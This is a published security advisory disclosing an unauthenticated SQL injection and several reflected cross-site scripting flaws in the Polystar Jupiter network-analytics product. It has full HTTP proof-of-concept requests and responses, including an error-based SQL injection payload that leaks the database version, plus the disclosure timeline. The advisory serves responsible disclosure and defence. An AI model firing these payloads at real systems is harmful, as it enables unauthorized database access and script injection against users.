Trustwave SpiderLabs Security Advisory TWSL2017-006:
Multiple Vulnerabilities in Polystar Jupiter

Published: 02/22/2017
Version: 1.0

Vendor: Polystar (http://www.polystar.com/)
Product: Jupiter
Version affected: All

Product Description:
Jupiter is a visualization tool used for analyzing large amounts of complex 
data from increasingly complex networks, including 4G, VoLTE, IMS, 3G and more. 
The Jupiter application suite provides dashboards, reports and analytical tools 
that createbusiness intelligence out of signalling data and help to deliver 
mission-critical information about operation and performance to a variety of 
departments. 

Finding 1: SQL Injection
Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs

It is possible for an unauthenticated user to inject arbitrary SQL commands 
into Polystar Jupiter backend database.

PoC FOR DETECTION:
==================
Location: https://a.b.c.d/system/phpext/interface.php
Parameter: usrId JSON parameter within the condition parameter

REQUEST:
--------
POST /system/phpext/interface.php HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://a.b.c.d/
Content-Length: 206
Cookie: Compaq-HMMD=0001-1bc15ce6-7ef1-11e6-b37a-83d8f1d9e1f9-1474348469925404
Connection: close

module=usrpro&action=validUser&condition={"usrId":"root'","passWd":"root","isEnctryted":false,"browserInfo":"firefox/48.0","vdfloaded":false}&transId=4

RESPONSE:
---------
HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 00:48:04 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 675
Connection: close
Content-Type: text/html; charset=UTF-8

Exception:::Message:"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '.<br>Incorrect user name or password. Please try again.','')' at line 2
 [SQL] : INSERT INTO system_log (createTime,time,moduleID,userID,moduleText,actionID,actionText,msgID,msgType,logMessage,misc) 
		        values(now(),1474418944,'usrpro','.other','','validUser','Log on','inputError','error ','Failed to log on user root'.<br>Incorrect user name or password. Please try again.','')" ==> Exception on line139 in file /var/www/jupiter-5.4.0.41/system/phpext/lib/dbbase/driver/DbMysql.class.php Exception Code is 0
		        
		        
PoC FOR EXPLOITATION:
=====================
Location: https://a.b.c.d/system/phpext/interface.php
Parameter: usrId JSON parameter within the condition parameter

REQUEST:
--------
POST /system/phpext/interface.php HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://a.b.c.d/
Content-Length: 277
Cookie: Compaq-HMMD=0001-1bc15ce6-7ef1-11e6-b37a-83d8f1d9e1f9-1474348469925404
Connection: close

module=usrpro&action=validUser&condition={"usrId":"root' OR (SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a) AND '1'='1","passWd":"root","isEnctryted":false,"browserInfo":"firefox/48.0","vdfloaded":false}&transId=4

RESPONSE:
---------
HTTP/1.1 200 OK
Date: Thu, 22 Sep 2016 11:32:44 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 646
Connection: close
Content-Type: text/html; charset=UTF-8

Exception:::Message:"Duplicate entry '5.5.37-MariaDB' for key 'group_key'
 [SQL] : INSERT INTO system_log (createTime,time,moduleID,userID,moduleText,actionID,actionText,msgID,msgType,logMessage,misc) 
		        values(now(),1474543965,'usrpro','.other','','validUser','Log on','inputError','error ','Failed to log on user root' OR (SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a) AND '1'='1.<br>Incorrect user name or password. Please try again.','')" ==> Exception on line139 in file /var/www/jupiter-5.4.0.41/system/phpext/lib/dbbase/driver/DbMysql.class.php Exception Code is 0
		        
				
				
Finding 2: Reflected Cross-site Scripting (XSS)
Credit: Elvin Hayes Gentiles of Trustwave SpiderLabs

Finding 2.1:
The 'action' and 'module' parameter in Jupiter is vulnerable to a cross-site 
scripting vulnerability when Javascript is supplied via GET request.

PoC:
====
REQUEST:
--------
GET /system/phpext/interface.php?program=modset&action=getModId<script>alert('XSS')</script>&module=modset<script>alert('XSS')</script>&transId=3 HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: Compaq-HMMD=0001-1bc15ce6-7ef1-11e6-b37a-83d8f1d9e1f9-1474348469925404
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE:
---------
HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 01:05:34 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 258
Connection: close
Content-Type: text/html; charset=UTF-8
Exception:::Message:"//root/module[@id="modset<script>alert('XSS')</script>"]/action[@id="getModId<script>alert('XSS')</script>"] is wrong!" ==> Exception on line84 in file /var/www/jupiter-5.4.0.41/system/phpext/lib/file/DomXml.
class.php Exception Code is 0

Finding 2.2:
The 'modules' JSON parameter within the 'condition' parameter in Jupiter is 
vulnerable to a cross-site scripting vulnerability when Javascript is supplied 
via POST request.

PoC:
====
REQUEST:
--------
POST /system/phpext/interface.php HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://a.b.c.d/
Content-Length: 295
Cookie: Compaq-HMMD=0001-1bc15ce6-7ef1-11e6-b37a-83d8f1d9e1f9-1474348469925404
Connection: close
Cache-Control: max-age=0

program=moload&module=moload&action=getModuleInfo&condition={"modules":["cellsmxss<img src=a onerror=alert('XSS')>","clichk","tmesys","usrpro","modset","hlpmeu","logdlg"],"args":{"log":false,"preLoad":true,"content":true,"lang":true,"loadedApp":[]}}&transId=2

RESPONSE:
---------
HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 01:26:48 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 123367
[{"moduleId":"cellsmxss<img src=a onerror=alert('XSS')>","moduleName":null,"modulePath":false,"moduleType":null,"lang":null,"files":[]}


Finding 2.3:
The 'usrId' JSON parameter within the 'condition' parameter in Jupiter is 
vulnerable to a cross-site scripting vulnerability when Javascript is supplied 
via POST request.

PoC:
====
REQUEST:
--------
POST /system/phpext/interface.php HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://a.b.c.d/
Content-Length: 207
Cookie: Compaq-HMMD=0001-1bc15ce6-7ef1-11e6-b37a-83d8f1d9e1f9-1474348469925404
Connection: close

module=usrpro&action=validUser&condition={"usrId":"root<img src=a onerror=alert(1)>","passWd":"root","isEnctryted":false,"browserInfo":"firefox/48.0","vdfloaded":false}&transId=4

RESPONSE:
---------
HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 01:31:48 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 151
Connection: close
Content-Type: text/html; charset=UTF-8
{"msgDes":"Failed to log on user root<img src=a onerror=alert(1)>.<br>Incorrect user name or password. Please try again.","misc":[],"msgType":"error"}

Vendor Response:
"The fixes for the items you sent are planned for our 6.0.1 release which will 
be released in Q1 2017."

Remediation Steps:
No fix is available for these vulnerabilities.  To limit exposure, the application 
should only be accessible on the local network.  Additionally, it is highly 
recommended that the administrator setup proper network segmentation and only 
authorized personnel has access through the use of Access Control Lists.

Revision History:
09/27/2016 - Attempt to contact vendor
11/10/2016 - Attempt to contact vendor
12/12/2016 - Attempt to contact vendor
12/15/2016 - Vulnerability disclosed to vendor
12/26/2016 - Exceeded 90 days timeframe for vendor to release a patch
02/22/2017 - Advisory published


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.